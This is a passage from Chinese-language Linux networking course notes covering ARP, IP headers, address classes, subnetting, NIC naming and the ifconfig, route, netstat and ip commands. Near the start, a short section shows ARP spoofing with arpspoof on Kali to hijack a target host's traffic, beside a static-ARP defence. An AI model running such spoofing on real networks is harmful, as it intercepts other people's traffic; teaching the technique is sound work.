192.168.1.118      ether  94:65:2d:38:44:82  C           eth0
 
 
#例：ARP静态绑定可以防止ARP欺骗
[root@centos8 ~]#arp -s 10.0.0.6 00:0c:29:32:80:38
[root@centos8 ~]#arp -n
Address         HWtype HWaddress      Flags Mask      Iface
10.0.0.6         ether  00:0c:29:32:80:38  CM          eth0
10.0.0.7         ether  00:0c:29:32:80:38  C           eth0
10.0.0.1         ether  00:50:56:c0:00:08  C           eth0
 
 
#例：kali 系统实现 arp 欺骗上网流量劫持
 
#启动路由转发功能
[root@kali ~]# echo 1 > /proc/sys/net/ipv4/ip_forward
 
#安装包
[root@kali ~]# apt-get install dsniff
 
#欺骗目标主机，本机是网关
[root@kali ~]# arpspoof -i eth0 -t 被劫持的目标主机IP 网关IP
 
#欺骗网关，本机是目标主机
[root@kali ~]# arpspoof -i eth0 -t 网关IP 被劫持的目标主机IP

Reverse Address Resolution Protocol

RARP 即将MAC转换成IP

3.5.1internet 协议

运行于 OSI 网络层
面向无连接的协议
独立处理数据包
分层编址
尽力而为传输
无数据恢复功能

3.5.2IP PDU 报头

3.5.3 IP PDU 报头格式

版本:占4位,指 IP 协议的版本目前的IP协议版本号为4
首部长度:占4位,可表示的最大数值是15个单位，一个单位为4字节，因此IP 的首部长度的最大值是
60字节

区分服务:占8位,用来获得更好的服务,在旧标准中叫做服务类型,但实际上一直未被使用过.后改名为
区分服务.只有在使用区分服务(DiffServ)时,这个字段才起作用.一般的情况下不使用

总长度:占16位,指首部和数据之和的长度,单位为字节,因此数据报的最大长度为 65535 字节.总长度
必须不超过最大传送单元 MTU

标识:占16位,它是一个计数器,通常，每发送一个报文，该值会加1，也用于数据包分片，在同一个
包的若干分片中，该值是相同的标志(flag):占3位,目前只有后两位有意义
DF： Don’t Fragment 中间的一位，只有当 DF=0 时才允许分片
MF： More Fragment 最后一位，MF=1表示后面还有分片,MF=0 表示最后一个分片IP PDU 报头

片偏移:占13位,指较长的分组在分片后，该分片在原分组中的相对位置.片偏移以8个字节为偏移单
位

生存时间:占8位,记为TTL (Time To Live) 数据报在网络中可通过的路由器数的最大值,TTL 字段是由
发送端初始设置一个 8 bit字段.推荐的初始值由分配数字 RFC 指定,当前值为 64.发送 ICMP 回显应
答时经常把 TTL 设为最大值 255

协议:占8位,指出此数据报携带的数据使用何种协议以便目的主机的IP层将数据部分上交给哪个处理
过程, 1表示为 ICMP 协议, 2表示为 IGMP 协议, 6表示为 TCP 协议, 17表示为 UDP 协议

首部检验和:占16位,只检验数据报的首部不检验数据部分.这里不采用 CRC 检验码而采用简单的计
算方法

源地址和目的地址:都各占4字节,分别记录源地址和目的地址


#例: TTL
C:\Users\xin>ping 10.70.0.1
正在 Ping 10.70.0.1 具有 32 字节的数据:
来自 10.70.0.1 的回复: 字节=32 时间=2ms TTL=254
来自 10.70.0.1 的回复: 字节=32 时间=2ms TTL=254
来自 10.70.0.1 的回复: 字节=32 时间=4ms TTL=254
来自 10.70.0.1 的回复: 字节=32 时间=2ms TTL=254
10.70.0.1 的 Ping 统计信息:
  数据包: 已发送 = 4，已接收 = 4，丢失 = 0 (0% 丢失)，
往返行程的估计时间(以毫秒为单位):
  最短 = 2ms，最长 = 4ms，平均 = 2ms
C:\Users\xin>
 
 
#例：发现IP冲突的主机
[root@centos8 ~]#arping 10.0.0.6
ARPING 10.0.0.6 from 10.0.0.8 eth0
Unicast reply from 10.0.0.6 [00:0C:29:E0:2F:37]  0.779ms
Unicast reply from 10.0.0.6 [00:0C:29:32:80:38]  0.798ms
Unicast reply from 10.0.0.6 [00:0C:29:32:80:38]  0.926ms
Unicast reply from 10.0.0.6 [00:0C:29:32:80:38]  0.864ms
^CSent 3 probes (1 broadcast(s))
Received 4 response(s)
 
 
#例: 禁用IPv6
#默认启动IPv6
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:ab:8f:2b brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.18/24 brd 10.0.0.255 scope global noprefixroute eth0
   valid_lft forever preferred_lft forever
 inet6 fe80::20c:29ff:feab:8f2b/64 scope link
   valid_lft forever preferred_lft forever
 
#修改内核配置
[root@centos8 ~]#vim /etc/sysctl.conf
#加下面两行
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
[root@centos8 ~]#sysctl -p
 
#查看IP验证
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:44:c3:fe brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.8/24 brd 10.0.0.255 scope global noprefixroute eth0
   valid_lft forever preferred_lft forever
 
 
##注意:禁用IPv6可能会影响一些服务的启动,如:ssh,postfix,mysql等
[root@centos8 ~]#vim /etc/ssh/sshd_config
#AddressFamily any 此行修改为以下行
AddressFamily inet
[root@centos8 ~]#systemctl restart sshd
 
 
[root@centos8 ~]#vim /etc/postfix/main.cf
#inet_interfaces = localhost 此行修改为以下行
inet_interfaces = 127.0.0.1 
[root@centos8 ~]#systemctl restart postfix
[root@centos8 ~]#ss -ntl
State      Recv-Q   Send-Q   Local Address:Port  Peer Address:Port 
   
LISTEN      0      128        0.0.0.0:22      0.0.0.0:*  
    
LISTEN      0      100       127.0.0.1:25      0.0.0.0:*

3.6IP地址

IP地址组成
它们可唯一标识 IP 网络中的每台设备，每台主机（计算机、网络设备、外围设备）必须具有唯一的地址
IP地址由两部分组成
网络 ID：标识网络，每个网段分配一个网络ID，处于高位
主机 ID：标识单个主机，由组织分配给各设备，处于低位
IPv4地址格式：点分十进制记法

3.6.1IP地址分类

A类：
        0 0000000 - 0 1111111.X.Y.Z : 0-127.X.Y.Z
        网络ID位是最高8位,主机ID是24位低位
        网络数：126=2^7(可变是的网络ID位数)-2
        每个网络中的主机数：2^24-2=16777214
        默认子网掩码：255.0.0.0
        私网地址：10.0.0.0
        范例:114.114.114.114,8.8.8.8,1.1.1.1,123.56.174.200,119.29.29.29

B类：
        10 000000 - 10 111111.X.Y.Z：128-191.X.Y.Z
        网络ID位是最高16位,主机ID是16位低位
        网络数：2^14=16384
        每个网络中的主机数：2^16-2=65534
        默认子网掩码：255.255.0.0

私网地址：172.16.0.0-172.31.0.0
范例:180.76.76.76，172.16.0.1

C类：
        110 0 0000 - 110 1 1111.X.Y.Z: 192-223.X.Y.Z
        网络ID位是最高24位,主机ID是8位低位
        网络数：2^21=2097152
        每个网络中的主机数：2^8-2=254
        默认子网掩码：255.255.255.0
        私网地址：192.168.0.0-192.168.255.0
        范例: 223.6.6.6,223.5.5.5

D类：组（多）播，1110 0000 - 1110 1111.X.Y.Z: 224-239.X.Y.Z

E类：保留未使用，240-255

3.6.2公共和私有IP地址

私有IP地址：不直接用于互联网，通常在局域网中使用

公共IP地址：互联网上设备拥有的唯一地址

3.6.3特殊地址

        0.0.0.0
        0.0.0.0不是一个真正意义上的IP地址。它表示所有不清楚的主机和目的网络
        255.255.255.255
        限制广播地址。对本机来说，这个地址指本网段内(同一广播域)的所有主机
        127.0.0.1～127.255.255.254
        本机回环地址，主要用于测试。在传输介质上永远不应该出现目的地址为“127.0.0.1”的数据包
224.0.0.0到239.255.255.255
        组播地址，224.0.0.1特指所有主机，224.0.0.2特指所有路由器。224.0.0.5指OSPF 路由器，地址多用于一些特定的程序以及多媒体程序
        169.254.x.x
        如果Windows主机使用了DHCP自动分配IP地址，而又无法从DHCP服务器获取地址，系统会为主机分配这样地址

3.6.4保留地址

例:
172.16.0.0 网络中的两个地址:172.16.0.0 172.16.255.255

3.6.5子网掩码

CIDR：无类域间路由，目前的网络已不再按A，B，C类划分网段，可以任意指定网段的范围
CIDR 无类域间路由表示法：IP/网络ID位数，如：172.16.0.100/16
netmask子网掩码：32位或128位（IPv6）的数字，和IP成对使用，用来确认IP地址中的网络ID和主机ID，对应网络ID的位为1，对应主机ID的位为0,范例:255.255.255.0 ，表现为连续的高位为1，连续的低位为0

子网掩码的八位


#相关公式：
    一个网络的最多的主机数 ＝2 ^ 主机ID位数 - 2
    网络（段）数 = 2 ^ 网络ID中可变的位数
    网络ID = IP 与 netmask
 
 
#判断对方主机是否在同一个网段：
用自已的子网掩码分别和自已的IP及对方的IP相与，比较结果，相同则同一网络，不同则不同网段
 
 
#例:
netmask: 255.255.224.0,网络ID位:19 主机ID位:13,主机数=2^13-2=8190
 
 
#例：判断A和B是否在网一个网段?
A: 192.168.1.100 netmask:255.255.255.0
B: 192.168.2.100 netmask:255.255.0.0
 
 
#例：一个主机：172.16.1.100/28
1、此主机所在的网段最多有多少主机?主机数=2^(32-28)-2=14
2、网络ID? IP和子网掩码相与，172.16.1.96
3、此网段的主机中最小的IP：172.16.1.97，最大的IP?172.16.1.110

3.7划分子网

划分子网：将一个大的网络（主机数多）划分成多个小的网络（主机数少），主机ID位数变少，网络ID位数变多，网络ID位向主机ID位借n位,将划分2^n个子网

可变长度子网掩码

Subnet地址


#例：
中国移动10.0.0.0/8 给32个各省公司划分对应的子网
1）每个省公司的子网的netmask？
2^5>=32 借5位网络ID
8+5=13
255.248.0.0
2)每个省公司的子网的主机数有多少？
2^(32-13)-2=524286
3）河南省得到第10个子网，网络ID？
10.00000 000.0.0/13
10.01001 000.0.0/13
10.72.0.0/13
4）河南省得到第10个子网的最小IP和最大的IP？
10.01001 000.0.1
10.01001 111.11111111.11111110
10.72.0.1---10.79.255.254
5）所有子网中最大，最小的子网的netid？
10.00000 000.0.0/13 10.0.0.0/13
10.11111 000.0.0/13 10.248.0.0/13

3.7.1优化IP地址分配


#例：
 8个C类网段
220.78.168.0/24
220.78.169.0/24
220.78.170.0/24
220.78.171.0/24
220.78.172.0/24
220.78.173.0/24
220.78.174.0/24
220.78.175.0/24
220.78.10101 000.0  220.78.168.0/24
220.78.10101 001.0  220.78.169.0/24
220.78.10101 010.0  220.78.170.0/24
......
220.78.10101 110.0  220.78.174.0/24
220.78.10101 111.0  220.78.175.0/24
 
#合并成一个大网
220.78.168.0/21

3.7.2 跨网络通信

跨网络通信：路由,选择路径
路由分类：
        主机路由
        网络路由
        默认路由
优先级：精度越高，优先级越高

3.7.3动态主机配置协议 DHCP

4 网络配置

4.1 基本网络配置

将Linux主机接入到网络，需要配置网络相关设置
一般包括如下内容：
        主机名
        IP/netmask
        路由：默认网关
        DNS服务器
        主DNS服务器
        次DNS服务器
        第三个DNS服务器

4.2 网卡名称


#CentOS6
#网络接口识别并命名相关的udev配置文件
/etc/udev/rules.d/70-persistent-net.rules
 
 
 
#查看网卡：
dmesg |grep –i eth
ethtool -i eth0
 
 
#卸载网卡驱动：
modprobe -r e1000
rmmod e1000
 
 
#装载网卡驱动：
modprobe e1000
 
 
#例：临时修改网卡名称
[root@centos6 ~]#ip link set eth0 down
[root@centos6 ~]#ip link set eth0 name abc
[root@centos6 ~]#ip link set abc up

4.2.2 CentOS 7 以上版网络配置

CentOS 6之前，网络接口使用连续号码命名：eth0、eth1等,当增加或删除网卡时，名称可能会发生变化
CentOS 7 以上版使用基于硬件，设备拓扑和设置类型命名,可以保持网卡名称的稳定
CentOS 8 中已弃用network.service，采用NetworkManager（NM）为网卡启用命令。CentOS 8 仍可
以安装network.service作为网卡服务，只是默认没有安装，具体方法为： dnf install network-
scripts ，不过官方已明确在下一个大版本中，将彻底放弃network.service，不建议继续使用
network.service管理网络。

systemd对网络设备的命名方式：

1. 如果Firmware或BIOS为主板上集成的设备提供的索引信息可用，且可预测则根据此索引进行命
名，如：eno1
2. 如果Firmware或BIOS为PCI-E扩展槽所提供的索引信息可用，且可预测，则根据此索引进行命名，如：ens1
3. 如果硬件接口的物理位置信息可用，则根据此信息命名，如：enp2s0
4. 如果用户显式启动，也可根据MAC地址进行命名，如：enx2387a1dc56
5. 上述均不可用时，则使用传统命名机制

基于BIOS支持启用biosdevname软件


#内置网卡：em1,em2 
pci卡：pYpX Y：slot ,X:port
 
 
#网卡组成格式
en: Ethernet 有线局域网
wl: wlan 无线局域网
ww: wwan无线广域网
o<index>: 集成设备的设备索引号
s<slot>: 扩展槽的索引号
x<MAC>: 基于MAC地址的命名
p<bus>s<slot>: enp2s1
 
 
#使用传统命名方式：
(1) 编辑/etc/default/grub配置文件
GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
 
(2) 为grub2生成其配置文件
On a system with UEFI boot mode:
# grub2-mkconfig -o /boot/efi/EFI/redhat/grub.cfg
 
On a system with legacy boot mode:
# grub2-mkconfig -o /boot/grub2/grub.cfg
# grub2-mkconfig -o /etc/grub2.cfg
 
(3) 重启系统
reboot
 
#自定义网卡名
GRUB_CMDLINE_LINUX="... net.ifnames.prefix=<required prefix>"
 
 
#例: 自定义网卡名
[root@centos8 ~]# vi /etc/default/grub
GRUB_CMDLINE_LINUX="net.ifnames.prefix=xin"
[root@centos8 ~]# grub2-mkconfig -o /boot/grub2/grub.cfg
[root@centos8 ~]# reboot
[root@centos8 ~]# ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT
group default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
。。。。。

4.3 网络配置命令

4.3.1 主机名


#设置主机名：
hostnamectl set-hostname centos7.baidu.com
hostname
hostnamectl status

4.3.2 网络配置方式


#静态指定:
ifconfig, route, netstat
ip: object {link, addr, route}, ss, tc
system-config-network-tui，setup
配置文件
 
#动态分配：
DHCP: Dynamic Host Configuration Protocol

4.3.3 ifconfig 命令


#来自于net-tools包，建议使用 ip 代替
[root@centos8 ~]#rpm -qi net-tools
Name    : net-tools
Version   : 2.0
Release   : 0.51.20160912git.el8
Architecture: x86_64
Install Date: Tue 21 Apr 2020 05:10:33 PM CST
。。。。
 
 
#例：
ifconfig [interface]
ifconfig -a
ifconfig IFACE [up|down]
ifconfig interface [aftype] options | address ...
ifconfig IFACE IP/netmask [up]
ifconfig IFACE IP netmask NETMASK
启用混杂模式：[-]promisc
 
#注意：此命令执行后会立即生效
 
#例：
[root@centos8 ~]#ifconfig eth0 10.0.0.68 netmask 255.255.0.0
 
#清除eth0上面的IP地址
[root@centos8 ~]#ifconfig eth0 0.0.0.0
 
#启用和禁用网卡
[root@centos8 ~]#ifconfig eth0 down
[root@centos8 ~]#ifconfig eth0 up
 
#对一个网卡设置多个IP地址
[root@centos8 ~]#ifconfig eth0:1 172.16.0.8/24
[root@centos8 ~]#ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.8 netmask 255.0.0.0 broadcast 10.255.255.255
   inet6 fe80::20c:29ff:fe45:a8a1 prefixlen 64 scopeid 0x20<link>
   ether 00:0c:29:45:a8:a1 txqueuelen 1000 (Ethernet)
   RX packets 813 bytes 75898 (74.1 KiB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 563 bytes 76262 (74.4 KiB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0:1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 172.16.0.8 netmask 255.255.255.0 broadcast 172.16.0.255
   ether 00:0c:29:45:a8:a1 txqueuelen 1000 (Ethernet)
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
   inet 127.0.0.1 netmask 255.0.0.0
   inet6 ::1 prefixlen 128 scopeid 0x10<host>
。。。。
 
[root@centos8 ~]#ifconfig eth0:1 down
[root@centos8 ~]#ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.8 netmask 255.0.0.0 broadcast 10.255.255.255
   inet6 fe80::20c:29ff:fe45:a8a1 prefixlen 64 scopeid 0x20<link>
   ether 00:0c:29:45:a8:a1 txqueuelen 1000 (Ethernet)
   RX packets 864 bytes 80572 (78.6 KiB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 601 bytes 81681 (79.7 KiB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
   inet 127.0.0.1 netmask 255.0.0.0
   inet6 ::1 prefixlen 128 scopeid 0x10<host>
   loop txqueuelen 1000 (Local Loopback)
   RX packets 2 bytes 140 (140.0 B)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 2 bytes 140 (140.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
 
#里：
[root@centos8 ~]#ifconfig -s
Iface   MTU  RX-OK RX-ERR RX-DRP RX-OVR  TX-OK TX-ERR TX-DRP TX-OVR Flg
eth0       1500  673005    0    0 0     672688    0    0   0 BMRU
lo          65536    70    0    0 0       70      0    0   0 LRU
 
[root@centos8 ~]#ifconfig -s eth0
Iface   MTU  RX-OK RX-ERR RX-DRP RX-OVR  TX-OK TX-ERR TX-DRP TX-OVR Flg
eth0       1500  673011    0    0 0     672694    0    0   0 BMRU

4.3.4 route 命令

路由表管理命令：

路由表主要构成:
        Destination: 目标网络ID,表示可以到达的目标网络ID,0.0.0.0/0 表示所有未知网络,又称为默认路由,优先级最低
        Genmask:目标网络对应的netmask
        Iface: 到达对应网络,应该从当前主机哪个网卡发送出来
        Gateway: 到达非直连的网络,将数据发送到临近(下一个)路由器的临近本主机的接口的IP地址,如果是直连网络,gateway是0.0.0.0
        Metric: 开销cost,值越小,路由记录的优先级最高


#查看路由表
route
route -n
 
 
#例：
[root@centos8 ~]#route
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
default     _gateway     0.0.0.0     UG   100   0     0 eth0
10.0.0.0     0.0.0.0     255.255.255.0  U   100   0     0 eth0
[root@centos8 ~]#route -n
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.0.0.2     0.0.0.0     UG   100   0     0 eth0
10.0.0.0     0.0.0.0     255.255.255.0  U   100   0     0 eth0
 
 
 
#添加路由：route add
route add [-net|-host|default] target [netmask Nm] [gw GW] [[dev] If]
 
#删除路由：route del
route del [-net|-host] target [gw Gw] [netmask Nm] [[dev] If]
 
 
#例：
#目标：192.168.1.3 网关：172.16.0.1
route add -host 192.168.1.3 gw 172.16.0.1 dev eth0
 
#目标：192.168.0.0 网关：172.16.0.1
route add -net 192.168.0.0 netmask 255.255.255.0 gw 172.16.0.1 dev eth0
route add -net 192.168.0.0/24 gw 172.16.0.1 dev eth0
route add -net 192.168.8.0/24 dev eth1 metric 200
 
#默认路由，网关：172.16.0.1
route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1
route add -net 0.0.0.0/0 gw 172.16.0.1
route add default gw 172.16.0.1
 
#目标：192.168.1.3 网关：172.16.0.1
route del -host 192.168.1.3
 
#目标：192.168.0.0 网关：172.16.0.1
route del -net 192.168.0.0 netmask 255.255.255.0

例：实现静态路由


#基础环境：
四台主机：
A主机：eth0 NAT模式
R1主机：eth0 NAT模式,eth1 仅主机模式
R2主机：eth0 桥接模式,eth1 仅主机模式
B主机：eth0 桥接模式
 
 
#配置A主机
ifconfig eth0 10.0.0.123/8
route add -net 10.0.0.0/8 dev eth0
route add default gw 10.0.0.200 dev eth0
#配置R1
ifconfig eth0 10.0.0.200/8
ifconfig eth1 192.168.0.200/24
route add -net 10.0.0.0/8 dev eth0
route add -net 192.168.0.0/24 dev eth1
route add -net 172.16.0.0/16 gw 192.168.0.201 dev eth1
echo 1 > /proc/sys/net/ipv4/ip_forward
#配置R2
ifconfig eth0 172.16.0.200/16
ifconfig eth1 192.168.0.201/24
route add -net 192.168.0.0/24 dev eth1
route add -net 172.16.0.0/16 dev eth0
route add -net 10.0.0.0/8 gw 10.0.0.200 dev eth1
echo 1 > /proc/sys/net/ipv4/ip_forward
#配置B
ifconfig eth0 172.16.0.123/16
route add -net 172.16.0.0/16 dev eth0
route add default gw 172.16.0.200 dev eth0
 
 
#例：
[root@router ~]#echo 1 > /proc/sys/net/ipv4/ip_forward

4.3.5 配置动态路由

通过守护进程获取动态路由，安装quagga包,通过命令vtysh配置
支持多种路由协议：
        RIP：Routing Information Protocol，路由信息协议
        OSPF：Open Shortest Path First，开放式最短路径优先
        BGP：Border Gateway Protocol，边界网关协议

4.3.6 netstat 命令

来自于net-tools包，建议使用 ss 代替


#显示网络连接：
netstat [--tcp|-t] [--udp|-u] [--raw|-w] [--listening|-l] [--all|-a] [--numeric|-
n] [--extend|-e[--extend|-e]] [--program|-p]
 
#常用选项：
-t: tcp协议相关
-u: udp协议相关
-w: raw socket相关
-l: 处于监听状态
-a: 所有状态
-n: 以数字显示IP和端口
-e：扩展格式
-p: 显示相关进程及PID
 
#常用组合：
-tan, -uan, -tnl, -unl
 
 
#显示路由表：
netstat {--route|-r} [--numeric|-n]
-r: 显示内核路由表
-n: 数字格式
 
 
#例: 统计网络信息
[root@centos8 ~]#netstat -s
Ip:
 Forwarding: 2
  88 total packets received
  0 forwarded
  0 incoming packets discarded
  88 incoming packets delivered
68 requests sent out
  148 dropped because of missing route
Icmp:
  0 ICMP messages received
  0 input ICMP message failed
 ICMP input histogram:
  0 ICMP messages sent
  0 ICMP messages failed
 ICMP output histogram:
Tcp:
  0 active connection openings
  1 passive connection openings
  0 failed connection attempts
  0 connection resets received
  1 connections established
  70 segments received
  50 segments sent out
  0 segments retransmitted
  0 bad segments received
  0 resets sent
Udp:
  18 packets received
  0 packets to unknown port received
  0 packet receive errors
  18 packets sent
  0 receive buffer errors
  0 send buffer errors
UdpLite:
TcpExt:
  1 delayed acks sent
  26 packet headers predicted
  14 acknowledgments not containing data payload received
  19 predicted acknowledgments
 TCPRcvCoalesce: 5
 TCPOrigDataSent: 40
 TCPDelivered: 39
IpExt:
 InOctets: 8882
 OutOctets: 9803
 InNoECTPkts: 89
MPTcpExt:

4.3.7 显示接口统计数据


netstat {--interfaces|-I|-i} [iface] [--all|-a] [--extend|-e] [--program|-p] [--
numeric|-n]
netstat -i
netstat –I=IFACE
ifconfig -s IFACE
 
 
#例：
[root@centos8 ~]#netstat -Ieth0
Kernel Interface table
Iface       MTU  RX-OK RX-ERR RX-DRP RX-OVR  TX-OK TX-ERR TX-DRP TX-OVR
Flg
eth0       1500   4660    0    0 0      2460    0    0   0 BMRU
[root@centos8 ~]#ifconfig -s eth0
Iface   MTU  RX-OK RX-ERR RX-DRP RX-OVR  TX-OK TX-ERR TX-DRP TX-OVR Flg
eth0       1500   4745    0    0 0      2518    0    0   0 BMRU
[root@centos8 ~]#netstat -nt
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address      Foreign Address     State   
tcp     0   52 10.0.0.8:22       10.0.0.1:4927      ESTABLISHED

4.3.8 ip命令


#来自于iproute包，可用于代替ifconfig
 
 
##配置Linux网络属性
ip [ OPTIONS ] OBJECT { COMMAND | help }
 
 
 
#ip 命令说明：
OBJECT := { link | addr | route }
ip link - network device configuration
set dev IFACE，可设置属性：up and down：激活或禁用指定接口，相当于 ifup/ifdown
show [dev IFACE] [up]：：指定接口 ，up 仅显示处于激活状态的接口
 
man帮助:ip(8), ip-address(8), ip-link(8), ip-route(8)
 
 
#例: 查看帮助
[root@centos8 ~]#ip help
Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }
   ip [ -force ] -batch filename
where OBJECT := { link | address | addrlabel | route | rule | neigh | ntable |
         tunnel | tuntap | maddress | mroute | mrule | monitor | xfrm
|
         netns | l2tp | fou | macsec | tcp_metrics | token | netconf |
ila |
         vrf | sr | nexthop }
   OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |
          -h[uman-readable] | -iec | -j[son] | -p[retty] |
          -f[amily] { inet | inet6 | mpls | bridge | link } |
          -4 | -6 | -I | -D | -M | -B | -0 |
          -l[oops] { maximum-addr-flush-attempts } | -br[ief] |
          -o[neline] | -t[imestamp] | -ts[hort] | -b[atch] [filename]
|
          -rc[vbuf] [size] | -n[etns] name | -N[umeric] | -a[ll] |
          -c[olor]}
。。。。
 
[root@centos8 ~]#ip link help
Usage: ip link add [link DEV] [ name ] NAME
 
[root@centos8 ~]#ip addr help
Usage: ip address {add|change|replace} IFADDR dev IFNAME [ LIFETIME ]
                          [ CONFFLAG-LIST ]
   ip address del IFADDR dev IFNAME [mngtmpaddr]
   ip address {save|flush} [ dev IFNAME ] [ scope SCOPE-ID ]
。。。。
 
[root@centos8 ~]#ip route help
Usage: ip route { list | flush } SELECTOR
   ip route save SELECTOR
   ip route restore
   ip route showdump
   ip route get [ ROUTE_GET_FLAGS ] ADDRESS
。。。。
 
 
#ip 地址管理
ip addr { add | del } IFADDR dev STRING [label LABEL] [scope {global|link|host}]
[broadcast ADDRESS]
 
[label LABEL]：添加地址时指明网卡别名
[scope {global|link|host}]：指明作用域,global: 全局可用.link: 仅链接可用,host: 本机可用
[broadcast ADDRESS]：指明广播地址
 
ip address show
ip addr flush


#禁用网卡
ip link set eth1 down
 
#网卡改名
ip link set eth1 name xinnet 
 
#启用网卡
ip link set xinnet up
 
#网卡别名
ip addr add 172.16.100.100/16 dev eth0 label eth0:0
ip addr del 172.16.100.100/16 dev eth0 label eth0:0
 
#清除网络地址
ip addr flush dev eth0
 
 
#例: 增加网卡别名实现一个网卡多个IP
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
。。。。
 
 
[root@centos8 ~]#ip address add 10.0.0.18/24 dev eth0 label eth0:1
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:8a:51:21 brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.8/24 brd 10.0.0.255 scope global noprefixroute eth0
   valid_lft forever preferred_lft forever
 inet 10.0.0.18/24 scope global secondary eth0:1
   valid_lft forever preferred_lft forever
 inet6 fe80::20c:29ff:fe8a:5121/64 scope link
   valid_lft forever preferred_lft forever
 
 
 
[root@centos8 ~]#ip address del 10.0.0.18/24 dev eth0 label eth0:1
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:8a:51:21 brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.8/24 brd 10.0.0.255 scope global noprefixroute eth0
   valid_lft forever preferred_lft forever
 inet6 fe80::20c:29ff:fe8a:5121/64 scope link
   valid_lft forever preferred_lft forever
 
 
 
#例: 修改IP
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
。。。。
 
#先加新IP,再删除旧的IP
[root@centos8 ~]#ip address add 10.0.0.88/24 dev eth0
[root@centos8 ~]#ip address del 10.0.0.8/24 dev eth0
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
   valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:8a:51:21 brd ff:ff:ff:ff:ff:ff
 inet 10.0.0.88/24 scope global eth0
   valid_lft forever preferred_lft forever
 inet6 fe80::20c:29ff:fe8a:5121/64 scope link
   valid_lft forever preferred_lft forever
 
 
 
#例：
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
。。。。
 
[root@centos8 ~]#ip addr add 10.0.0.18/24 dev eth0
[root@centos8 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host
。。。。
